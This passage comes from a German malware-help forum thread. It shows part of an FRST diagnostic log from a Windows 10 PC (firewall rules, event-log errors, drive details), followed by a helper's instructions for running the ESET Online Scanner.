(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 09:24 - 2015-10-30 09:21 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-922123714-3683550124-3627477911-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-922123714-3683550124-3627477911-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-922123714-3683550124-3627477911-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-922123714-3683550124-3627477911-1001\...\StartupApproved\Run: => "Steam"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{8159814B-F2F6-4B3C-BFC4-D00A659D0D0D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AD37B569-852C-4029-98D0-888AAB1C7F73}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ACEFAC41-A1CA-4FA3-8C06-21A4DB3FC8B6}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{BB091F93-BB93-4A36-875E-0D23D5098523}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{174149DF-1E72-41F3-ABDD-7EACA0231254}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{8E7C3051-BABA-488E-B596-EE8AC7885BE4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{FECEACD2-9B0E-4627-B860-48461B303FA3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{0C10D8CB-0E0A-4C46-9599-CADC5D091545}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{7B2887CA-102B-4C92-B974-00604982DFFE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D1B3CA78-9933-4568-AA9F-2E770D4FDAD0}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{CC9A3744-6D80-4596-AA71-E3EBC0B774B7}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [UDP Query User{27B1EFD4-4DFE-4863-93D3-1ABBDD4CA473}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [TCP Query User{134036AD-235B-4D2D-9771-56CC182DFD58}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [UDP Query User{7B0B6AF4-6DB7-4E16-8128-78F53785FF74}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [{626D03BA-2D89-4533-B597-A17079C02924}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D8BBA469-01E6-4A27-A970-634B6F087639}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6F5E5312-C535-4EA6-A049-A77762310B1F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{A070F583-4CC9-45AB-B69F-BE63F006D44F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{9DA9940A-3DC2-42A6-BB2D-84E0DBC69220}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe
FirewallRules: [{5E50118E-A6B9-4C77-833C-089ED84B5EDC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe
FirewallRules: [{764844B9-8C23-449E-95A1-1582E8CC31FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{1DD157E8-F300-4A24-AF3C-5B9DAAA7204B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{0911418D-6741-4470-85FC-49D00C5E64AE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{C62BDA92-E01B-463D-86F5-268E34BE02CF}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe

==================== Wiederherstellungspunkte =========================

15-04-2016 21:20:54 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005

==================== Fehlerhafte Geräte im Gerätemanager =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/18/2016 03:20:19 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: NvStreamNetworkService.exe, Version: 7.1.2061.1794, Zeitstempel: 0x5702d6ad
Name des fehlerhaften Moduls: NvMdnsPlugin.dll_unloaded, Version: 0.0.0.0, Zeitstempel: 0x5702dc05
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000000d45a0
ID des fehlerhaften Prozesses: 0xbd8
Startzeit der fehlerhaften Anwendung: 0xNvStreamNetworkService.exe0
Pfad der fehlerhaften Anwendung: NvStreamNetworkService.exe1
Pfad des fehlerhaften Moduls: NvStreamNetworkService.exe2
Berichtskennung: NvStreamNetworkService.exe3
Vollständiger Name des fehlerhaften Pakets: NvStreamNetworkService.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NvStreamNetworkService.exe5

Error: (04/18/2016 03:20:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe, Version: 10.0.10586.0, Zeitstempel: 0x5632d7ba
Name des fehlerhaften Moduls: ESENT.dll, Version: 10.0.10586.212, Zeitstempel: 0x56fa1686
Ausnahmecode: 0xc0000602
Fehleroffset: 0x000000000022885f
ID des fehlerhaften Prozesses: 0x898
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe0
Pfad der fehlerhaften Anwendung: svchost.exe1
Pfad des fehlerhaften Moduls: svchost.exe2
Berichtskennung: svchost.exe3
Vollständiger Name des fehlerhaften Pakets: svchost.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: svchost.exe5

Error: (04/18/2016 03:20:18 AM) (Source: ESENT) (EventID: 908) (User: )
Description: svchost (2200) Der Prozess wird aufgrund eines nicht behebbaren Fehlers beendet: PV: 10.0.10586.0 SV: 10.0.10586.0 GLE: 0 ERR: -1054(tm.cxx:1630): dllentry.cxx(103) (ESENT[10.0.10586.0] RETAIL RTM MBCS)

Error: (04/18/2016 03:20:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: MARCEL)
Description: Bei der Aktivierung der App „Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/17/2016 04:01:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: MARCEL)
Description: Das Paket „Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy+WindowsDefaultLockScreen“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (04/15/2016 11:13:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: plugin-container.exe, Version: 45.0.2.5941, Zeitstempel: 0x57071d64
Name des fehlerhaften Moduls: mozglue.dll, Version: 45.0.2.5941, Zeitstempel: 0x57070ebc
Ausnahmecode: 0x80000003
Fehleroffset: 0x0000ec22
ID des fehlerhaften Prozesses: 0x18e8
Startzeit der fehlerhaften Anwendung: 0xplugin-container.exe0
Pfad der fehlerhaften Anwendung: plugin-container.exe1
Pfad des fehlerhaften Moduls: plugin-container.exe2
Berichtskennung: plugin-container.exe3
Vollständiger Name des fehlerhaften Pakets: plugin-container.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: plugin-container.exe5

Error: (04/15/2016 10:36:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: NvStreamNetworkService.exe, Version: 7.1.2061.1794, Zeitstempel: 0x5702d6ad
Name des fehlerhaften Moduls: NvMdnsPlugin.dll_unloaded, Version: 0.0.0.0, Zeitstempel: 0x5702dc05
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000000d45a0
ID des fehlerhaften Prozesses: 0xb9c
Startzeit der fehlerhaften Anwendung: 0xNvStreamNetworkService.exe0
Pfad der fehlerhaften Anwendung: NvStreamNetworkService.exe1
Pfad des fehlerhaften Moduls: NvStreamNetworkService.exe2
Berichtskennung: NvStreamNetworkService.exe3
Vollständiger Name des fehlerhaften Pakets: NvStreamNetworkService.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NvStreamNetworkService.exe5

Error: (04/15/2016 10:04:48 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: MARCEL)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/15/2016 09:51:15 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: MARCEL)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/15/2016 09:46:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: MARCEL)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.


Systemfehler:
=============
Error: (04/18/2016 11:35:18 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_5125a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/18/2016 11:35:17 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/18/2016 11:18:43 AM) (Source: DCOM) (EventID: 10016) (User: MARCEL)
Description: ComputerstandardLokalAktivierung{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}MARCELMarcelS-1-5-21-922123714-3683550124-3627477911-1001LocalHost (unter Verwendung von LRPC)Microsoft.Windows.FeatureOnDemand.InsiderHub_10.0.10586.0_neutral_neutral_cw5n1h2txyewyS-1-15-2-4016783169-893401051-2237370320-274899566-412088533-2398988950-2155762795

Error: (04/18/2016 03:20:18 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "StateRepository-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/18/2016 03:20:14 AM) (Source: DCOM) (EventID: 10010) (User: MARCEL)
Description: App.AppXwdz8g2fxr36xz0tdtagygnvemf85s7gg.mca

Error: (04/18/2016 03:20:13 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_362c8" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/18/2016 03:20:13 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/17/2016 01:55:28 PM) (Source: DCOM) (EventID: 10010) (User: MARCEL)
Description: Windows.Media.Capture.Internal.AppCaptureShell

Error: (04/17/2016 01:55:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_87ccd2e" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/17/2016 01:55:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar


CodeIntegrity:
===================================
  Date: 2016-04-15 22:34:02.723
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-15 22:27:18.841
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-15 21:20:55.368
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-15 21:13:18.332
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 23%
Installierter physikalischer RAM: 8143.18 MB
Verfügbarer physikalischer RAM: 6242.68 MB
Summe virtueller Speicher: 10063.18 MB
Verfügbarer virtueller Speicher: 8027.92 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.88 GB) (Free:160.1 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive e: (Volume) (Fixed) (Total:465.66 GB) (Free:395.46 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: DAB05CD6)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 237E739B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

burningice 19.04.2016 00:28
Also das wär jetzt nun nicht nötig gewesen...

Schauen wir noch schnell, ob deine bestehenden Daten sauber sind:

ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Hinweis: Dieser Scan kann schon einmal mehrere Stunden dauern...


Alle Zeitangaben in WEZ +1. Es ist jetzt 13:56 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131